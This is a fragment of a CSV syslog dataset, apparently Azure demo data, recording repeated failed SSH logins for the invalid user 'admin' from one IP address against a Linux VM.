+1373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:12,UbuntuDevEnv,2019-06-28 04:42:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:14,UbuntuDevEnv,2019-06-28 04:42:13,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 53860 ssh2,85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,53860,,
+1375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:14,UbuntuDevEnv,2019-06-28 04:42:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:16,UbuntuDevEnv,2019-06-28 04:42:15,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 53860 ssh2,85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,53860,,
+1377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:16,UbuntuDevEnv,2019-06-28 04:42:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:18,UbuntuDevEnv,2019-06-28 04:42:17,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 53860 ssh2,85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,53860,,
+1379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:18,UbuntuDevEnv,2019-06-28 04:42:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:20,UbuntuDevEnv,2019-06-28 04:42:20,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 53860 ssh2,85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,53860,,
+1381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:21,UbuntuDevEnv,2019-06-28 04:42:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:22,UbuntuDevEnv,2019-06-28 04:42:22,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 53860 ssh2,85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,53860,,
+1383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:22,UbuntuDevEnv,2019-06-28 04:42:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:24,UbuntuDevEnv,2019-06-28 04:42:23,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 193.201.224.232 port 53860 ssh2 [preauth],85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,53860,,
+1385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:24,UbuntuDevEnv,2019-06-28 04:42:23,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 53860 ssh2,85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,53860,,
+1386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:24,UbuntuDevEnv,2019-06-28 04:42:23,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:24,UbuntuDevEnv,2019-06-28 04:42:23,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:24,UbuntuDevEnv,2019-06-28 04:42:23,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 193.201.224.232 port 53860: Too many authentication failures [preauth],85648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,53860,,
+1389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:28,UbuntuDevEnv,2019-06-28 04:42:27,auth,UbuntuDevEnv,info,Invalid user admin from 193.201.224.232 port 22098,85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,22098,,
+1390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:28,UbuntuDevEnv,2019-06-28 04:42:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:28,UbuntuDevEnv,2019-06-28 04:42:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:30,UbuntuDevEnv,2019-06-28 04:42:29,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 22098 ssh2,85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,22098,,
+1393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:31,UbuntuDevEnv,2019-06-28 04:42:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:33,UbuntuDevEnv,2019-06-28 04:42:33,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 22098 ssh2,85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,22098,,
+1395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:38,UbuntuDevEnv,2019-06-28 04:42:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:40,UbuntuDevEnv,2019-06-28 04:42:39,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 22098 ssh2,85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,22098,,
+1397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:46,UbuntuDevEnv,2019-06-28 04:42:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:47,UbuntuDevEnv,2019-06-28 04:42:47,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 22098 ssh2,85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,22098,,
+1399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:53,UbuntuDevEnv,2019-06-28 04:42:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:42:55,UbuntuDevEnv,2019-06-28 04:42:55,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 22098 ssh2,85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,22098,,
+1401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:05,UbuntuDevEnv,2019-06-28 04:43:04,auth,UbuntuDevEnv,info,"Disconnecting invalid user admin 193.201.224.232 port 22098: Change of username or service not allowed: (admin,ssh-connection) -> (Admin,ssh-connection) [preauth]",85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,22098,,
+1402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:05,UbuntuDevEnv,2019-06-28 04:43:04,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:05,UbuntuDevEnv,2019-06-28 04:43:04,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,85705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:05,UbuntuDevEnv,2019-06-28 04:43:05,auth,UbuntuDevEnv,info,Invalid user Admin from 193.201.224.232 port 6830,85847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Admin,193.201.224.2,6830,,
+1405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:05,UbuntuDevEnv,2019-06-28 04:43:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:05,UbuntuDevEnv,2019-06-28 04:43:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,85847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:08,UbuntuDevEnv,2019-06-28 04:43:07,auth,UbuntuDevEnv,info,Failed password for invalid user Admin from 193.201.224.232 port 6830 ssh2,85847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Admin,193.201.224.2,6830,,
+1408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:08,UbuntuDevEnv,2019-06-28 04:43:07,auth,UbuntuDevEnv,info,"Disconnecting invalid user Admin 193.201.224.232 port 6830: Change of username or service not allowed: (Admin,ssh-connection) -> (admin,ssh-connection) [preauth]",85847,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Admin,193.201.224.2,6830,,
+1409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:08,UbuntuDevEnv,2019-06-28 04:43:08,auth,UbuntuDevEnv,info,Invalid user admin from 193.201.224.232 port 9429,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9429,,
+1410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:09,UbuntuDevEnv,2019-06-28 04:43:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:09,UbuntuDevEnv,2019-06-28 04:43:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:10,UbuntuDevEnv,2019-06-28 04:43:10,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 9429 ssh2,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9429,,
+1413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:10,UbuntuDevEnv,2019-06-28 04:43:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:13,UbuntuDevEnv,2019-06-28 04:43:12,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 9429 ssh2,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9429,,
+1415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:13,UbuntuDevEnv,2019-06-28 04:43:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:15,UbuntuDevEnv,2019-06-28 04:43:15,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 9429 ssh2,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9429,,
+1417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:16,UbuntuDevEnv,2019-06-28 04:43:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:18,UbuntuDevEnv,2019-06-28 04:43:17,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 9429 ssh2,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9429,,
+1419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:22,UbuntuDevEnv,2019-06-28 04:43:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:24,UbuntuDevEnv,2019-06-28 04:43:24,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 9429 ssh2,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9429,,
+1421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:25,UbuntuDevEnv,2019-06-28 04:43:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:27,UbuntuDevEnv,2019-06-28 04:43:27,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 193.201.224.232 port 9429 ssh2 [preauth],85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9429,,
+1423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:27,UbuntuDevEnv,2019-06-28 04:43:27,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 193.201.224.232 port 9429: Too many authentication failures [preauth],85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9429,,
+1424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:27,UbuntuDevEnv,2019-06-28 04:43:27,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:27,UbuntuDevEnv,2019-06-28 04:43:27,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 9429 ssh2,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9429,,
+1426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:27,UbuntuDevEnv,2019-06-28 04:43:27,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,85856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:31,UbuntuDevEnv,2019-06-28 04:43:31,auth,UbuntuDevEnv,info,Invalid user admin from 193.201.224.232 port 15093,85946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,15093,,
+1428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:32,UbuntuDevEnv,2019-06-28 04:43:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:32,UbuntuDevEnv,2019-06-28 04:43:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,85946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:34,UbuntuDevEnv,2019-06-28 04:43:34,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 15093 ssh2,85946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,15093,,
+1431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:34,UbuntuDevEnv,2019-06-28 04:43:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:36,UbuntuDevEnv,2019-06-28 04:43:36,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 15093 ssh2,85946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,15093,,
+1433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:43:38,UbuntuDevEnv,2019-06-28 04:43:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
